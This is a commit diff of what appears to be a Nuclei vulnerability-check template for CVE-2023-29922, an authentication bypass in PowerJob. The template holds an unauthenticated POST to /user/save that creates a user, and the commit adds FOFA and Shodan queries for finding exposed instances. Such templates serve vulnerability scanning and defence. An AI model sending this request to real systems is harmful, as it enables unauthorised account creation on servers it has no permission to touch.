remove unnecessary header
parent
5c52ea0bba
commit
7f0d2c574f
|
@ -15,8 +15,9 @@ info:
|
||||||
cve-id: CVE-2023-29922
|
cve-id: CVE-2023-29922
|
||||||
cwe-id: CWE-1188
|
cwe-id: CWE-1188
|
||||||
metadata:
|
metadata:
|
||||||
fofa-query: app="PowerJob"
|
|
||||||
verified: "true"
|
verified: "true"
|
||||||
|
fofa-query: app="PowerJob"
|
||||||
|
shodan-query: html:"PowerJob"
|
||||||
tags: cve,cve2023,auth-bypass,powerjob
|
tags: cve,cve2023,auth-bypass,powerjob
|
||||||
|
|
||||||
variables:
|
variables:
|
||||||
|
@ -27,12 +28,6 @@ requests:
|
||||||
- |
|
- |
|
||||||
POST /user/save HTTP/1.1
|
POST /user/save HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Upgrade-Insecure-Requests: 1
|
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
|
|
||||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
||||||
Accept-Encoding: gzip, deflate
|
|
||||||
Accept-Language: zh-CN,zh;q=0.9
|
|
||||||
Connection: close
|
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
|
|
||||||
{"username":"{{str}}","phone":"{{str}}","email":"{{str}}","webHook":"{{str}}"}
|
{"username":"{{str}}","phone":"{{str}}","email":"{{str}}","webHook":"{{str}}"}
|
||||||
|
@ -42,7 +37,9 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "true"
|
- '"success":true'
|
||||||
|
- '"data":null'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
@ -51,4 +48,4 @@ requests:
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
Loading…
Reference in New Issue